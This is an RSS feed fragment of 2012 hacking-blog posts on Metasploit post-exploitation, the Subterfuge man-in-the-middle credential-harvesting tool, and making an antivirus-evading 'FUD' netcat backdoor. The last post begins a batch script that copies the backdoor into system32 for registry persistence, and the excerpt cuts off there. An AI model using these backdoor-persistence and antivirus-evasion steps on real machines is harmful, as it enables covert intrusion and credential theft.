domain="http://www.blogger.com/atom/ns#">EH Tips</category><category domain="http://www.blogger.com/atom/ns#">Guest Post</category><title>Post Exploitation &amp; Meterpreter Scripting -Metasploit</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/QLNxNJLLHEkyDWTdiAzk3-30ISM/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/QLNxNJLLHEkyDWTdiAzk3-30ISM/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/QLNxNJLLHEkyDWTdiAzk3-30ISM/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/QLNxNJLLHEkyDWTdiAzk3-30ISM/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; font-family: inherit; text-align: center;"&gt;
&lt;a href="http://www.ehacking.net/2012/05/post-exploitation-meterpreter-scripting.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="180" src="http://4.bp.blogspot.com/-NppDLIZMVqw/T6VX_FKflKI/AAAAAAAABK0/yblMl0svq6o/s200/images.jpeg" width="220" /&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Metasploit has now become the king of tools used in &lt;a href="http://www.infosecinstitute.com/courses/security.html" style="color: blue;" target="_blank"&gt;penetration testing&lt;/a&gt;. It’s comprised of a collection of all available exploits. The 
tool has its pros and cons; some advantages are:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;
&lt;/b&gt;&lt;/span&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;It automates the process of penetration testing&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;
&lt;/b&gt;&lt;/span&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Fast (less time require)&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;
&lt;/b&gt;&lt;/span&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Reliable&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;
&lt;/b&gt;&lt;/span&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;It offers a lot of advanced features that we will discuss step by step&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/ul&gt;
&lt;ul style="font-family: inherit;"&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/ul&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Just
 as a comparison between automatic and manual penetration testing and 
vulnerability assessment approaches: the automatic process is fast but 
in some cases does not give the desired result. Manual testing is slow, 
but more precise and we cannot neglect it. As far as disadvantages go, 
metasploit does not have one, excepting the possibility that automatic 
tools do not always work. The point being, metasploit only has the 
available exploits. If the server’s software is fully patched, then 
metasploit would fail. (There are many methods of using metasploit. 
Here, “fail” means to exploit the available vulnerability.) This being 
the case, we will surely need to implement a manual test to find the 
0-day vulnerability. This then is the weakness of metasploit. However, 
metasploit is the hot topic among penetration testers, and many advances
 have been made. The security community is currently working to make 
metasploit even more useful.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Metasploit is based on module system.
 From this point onward, I will assume that you are aware of basic usage
 of metasploit, like about msfconsole, meterpreter, exploits, payload 
and auxiliary module.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;h2 style="font-family: inherit; text-align: center;"&gt;


&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: blue;"&gt;Post Exploitation&lt;/span&gt;&lt;br /&gt; &lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;The
 main objective in discussing post exploitation is to cover meterpreter 
scripting. Post exploitation is the technique/ method /procedure or 
standard to identify and to monitor a target host, to find the way of 
future access.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;What is post exploitation? Why is post exploitation
 important? Some of these questions are important to understand the 
phenomena, so let us suppose you have successfully hacked (compromised) a
 host, but you want to use this session for some other time. It is not a
 good practice to start things all over again. Moreover, what of you 
fail next time? Therefore, the best method is to prepare the compromised
 system for the next use. The other phase of post exploitation is to use
 the compromised host as an attacker machine and to attack on some other
 host or network via this compromised machine. Consider the picture below:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; font-family: inherit; text-align: center;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;a href="http://3.bp.blogspot.com/-GfDqTsYtEZE/T6VXOe9ck5I/AAAAAAAABKs/NMvS6_KxK5Y/s1600/110411_1612_PostExploit1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="368" src="http://3.bp.blogspot.com/-GfDqTsYtEZE/T6VXOe9ck5I/AAAAAAAABKs/NMvS6_KxK5Y/s400/110411_1612_PostExploit1.jpg" width="400" /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Now the above diagram shows the importance of post exploitation. Let 
us suppose that an attacker has successfully compromised the victim A. Now, the attacker wants to go on the web server, so for victim A,
 the web server is on the network. To hack on the same network is very 
easy: instead of a remote attack for this purpose, the attacker can use 
victim A as its own machine to attack on the network. This is what’s known as the post exploitation phase.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;To conclude, the post exploitation attack is the process of:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style="font-family: inherit;"&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Infrastructure analysis&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Routing analysis&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Protocol analysis&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;DNS server analysis&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;ARP analysis&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Proxy server analysis&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Host machine analysis (virtual or real host)&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Services and software’s analysis&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Sharing analysis&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Directory, name server and certificates analysis&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Backup and patch management analysis&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;To be continued :&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;This is an introductory part of the article that discuss the foundation of post exploitation, in the next article of this series we will discuss the practical of meterpreter scripting. Stay update and do not forget to share.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span class="st_twitter_large" displaytext="Tweet"&gt;&lt;/span&gt;&lt;span class="st_facebook_large" displaytext="Facebook"&gt;&lt;/span&gt;&lt;span class="st_ybuzz_large" displaytext="Yahoo! Buzz"&gt;&lt;/span&gt;&lt;span class="st_gbuzz_large" displaytext="Google Buzz"&gt;&lt;/span&gt;&lt;span class="st_email_large" displaytext="Email"&gt;&lt;/span&gt;&lt;span class="st_sharethis_large" displaytext="ShareThis"&gt;&lt;/span&gt;  
&lt;br /&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="color: red; font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;&lt;b&gt;RSS feed&lt;/b&gt;&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;&lt;b&gt;Facebook fan&lt;/b&gt;&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-4354591904522074358?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=YlYXlosxLE4:ufH1N6cXcd0:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=YlYXlosxLE4:ufH1N6cXcd0:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=YlYXlosxLE4:ufH1N6cXcd0:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=YlYXlosxLE4:ufH1N6cXcd0:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=YlYXlosxLE4:ufH1N6cXcd0:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=YlYXlosxLE4:ufH1N6cXcd0:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=YlYXlosxLE4:ufH1N6cXcd0:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=YlYXlosxLE4:ufH1N6cXcd0:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=YlYXlosxLE4:ufH1N6cXcd0:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=YlYXlosxLE4:ufH1N6cXcd0:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=YlYXlosxLE4:ufH1N6cXcd0:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=YlYXlosxLE4:ufH1N6cXcd0:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=YlYXlosxLE4:ufH1N6cXcd0:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/YlYXlosxLE4" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/YlYXlosxLE4/post-exploitation-meterpreter-scripting.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-NppDLIZMVqw/T6VX_FKflKI/AAAAAAAABK0/yblMl0svq6o/s72-c/images.jpeg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/05/post-exploitation-meterpreter-scripting.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-7537076171887936400</guid><pubDate>Mon, 30 Apr 2012 21:10:00 +0000</pubDate><atom:updated>2012-04-30T14:10:48.349-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorial</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">ARPspoof</category><category domain="http://www.blogger.com/atom/ns#">Man-In-The-Middle-Attack</category><title>Subterfuge - Man-in-the-Middle Attack Framework Tutorial</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/k5_rO2607NV-b4XV3thB0zGOkAY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/k5_rO2607NV-b4XV3thB0zGOkAY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/k5_rO2607NV-b4XV3thB0zGOkAY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/k5_rO2607NV-b4XV3thB0zGOkAY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.ehacking.net/2012/04/subterfuge-man-in-middle-attack.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="180" src="http://3.bp.blogspot.com/--YjKreXEEjA/T57_eEYs0YI/AAAAAAAABKg/sqSPaPbnGKo/s200/logo.png" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Subterfuge, a Framework to take the arcane art of &lt;a href="http://www.ehacking.net/search/label/Man-In-The-Middle-Attack" style="color: blue;" target="_blank"&gt;Man-in-the-Middle Attack&lt;/a&gt; and make it as simple as point and shoot. A beautiful, easy to 
use interface which produces a more transparent and effective attack is 
what sets Subterfuge apart from other attack tools. Subterfuge 
demonstrates vulnerabilities in the ARP Protocol by harvesting 
credentials that go across the network, and even exploiting machines 
through race conditions.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Subterfuge is a small but devastatingly effective credential-harvesting 
program which exploits a vulnerability in the Address Resolution 
Protocol. It does this in a way that a non-technical user would have the
 ability, at the push of a button, to harvest all of the usernames and 
passwords of victims on their connected network, thus equipping 
information and network security professionals with a “push-button” 
security validation tool.&amp;nbsp;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;The video below show you how to configure subterfuge on your computer, the operating system shown in the video is backtrack 5 but you can install subterfuge in other &lt;a href="http://www.ehacking.net/search/label/Linux" style="color: blue;" target="_blank"&gt;Linux&lt;/a&gt; distribution because subterfuge install dependencies by itself.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/34LiyXhvSlc?rel=0" width="480"&gt;&lt;/iframe&gt;


&lt;/div&gt;
&lt;div style="font-family: inherit; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-5XQIEScfP9I/T57-veyBnNI/AAAAAAAABKY/NxKSAF2MITA/s1600/subterfuge.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="299" src="http://1.bp.blogspot.com/-5XQIEScfP9I/T57-veyBnNI/AAAAAAAABKY/NxKSAF2MITA/s640/subterfuge.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;So this is a small video in the subterfuge tutorial I will show you how to perform the various attack. Do not forget to comment about this wonderful tool and do not forget to share your experiences regrading the framework. &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div dir="ltr" style="font-family: inherit; text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="color: red;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;RSS feed&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;Facebook fan&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-7537076171887936400?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Gqke1y2zJ5Y:DePAhfYJWpU:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Gqke1y2zJ5Y:DePAhfYJWpU:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=Gqke1y2zJ5Y:DePAhfYJWpU:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Gqke1y2zJ5Y:DePAhfYJWpU:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Gqke1y2zJ5Y:DePAhfYJWpU:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=Gqke1y2zJ5Y:DePAhfYJWpU:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Gqke1y2zJ5Y:DePAhfYJWpU:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=Gqke1y2zJ5Y:DePAhfYJWpU:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Gqke1y2zJ5Y:DePAhfYJWpU:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=Gqke1y2zJ5Y:DePAhfYJWpU:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Gqke1y2zJ5Y:DePAhfYJWpU:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Gqke1y2zJ5Y:DePAhfYJWpU:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Gqke1y2zJ5Y:DePAhfYJWpU:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/Gqke1y2zJ5Y" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/Gqke1y2zJ5Y/subterfuge-man-in-middle-attack.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/--YjKreXEEjA/T57_eEYs0YI/AAAAAAAABKg/sqSPaPbnGKo/s72-c/logo.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/04/subterfuge-man-in-middle-attack.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-2791460264773474227</guid><pubDate>Wed, 25 Apr 2012 15:38:00 +0000</pubDate><atom:updated>2012-04-25T08:39:56.040-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorial</category><category domain="http://www.blogger.com/atom/ns#">Pen-Testing</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">Windows</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">EH Tips</category><category domain="http://www.blogger.com/atom/ns#">AntiVirus</category><title>How to Create a FUD Backdoor – Bypass An Antivirus</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/B9JpXD1K7AU1ZrFRhAXXok3NarQ/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/B9JpXD1K7AU1ZrFRhAXXok3NarQ/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/B9JpXD1K7AU1ZrFRhAXXok3NarQ/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/B9JpXD1K7AU1ZrFRhAXXok3NarQ/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.ehacking.net/2012/04/how-to-create-fud-backdoor-bypass.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="180" src="http://1.bp.blogspot.com/-qRvBboKnzmE/T5gZOQyZL2I/AAAAAAAABKM/-U5Pi80-Tkw/s200/netcat.gif" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;How to bypass an Anti-virus or how to create a FUD (fully undetectable) backdoor is not a new topic of discussion, the need to bypass an antivirus is very high because it is very helpful in the process of penetration testing and &lt;a href="http://www.infosecinstitute.com/courses/advanced_ethical_hacking_training.html" style="color: blue;" target="_blank"&gt;ethical hacking&lt;/a&gt;. You can bypass an antivirus by using the metasploit encoders and there are many other ways, in this tutorial I will show you how to make your ncat FUD and how to use the netcat as a backdoor. &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;


 
 
 
 &lt;/b&gt;&lt;/span&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;

&lt;/div&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;As rcat is a good replica of &lt;a href="http://www.ehacking.net/2011/09/ncat-netcat-windows-and-linux-tutorial.html" style="color: blue;" target="_blank"&gt;Netcat&lt;/a&gt; and has an ability to bypass
most of the antivirus, then why not wrap it up with another file
(that must not a backdoor)?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;
&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;To do this we use a simple technique:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Create a batch file that will add your Netcat into the system
 folder and can edit the registry of the windows. Wait you don’t
 need to create it because I did it for you.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;

&lt;/li&gt;
&lt;/ol&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;@echo off&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;copy rcat.exe %systemroot%\system32\rcat.exe&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;if errorlevel 0 goto regedit&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
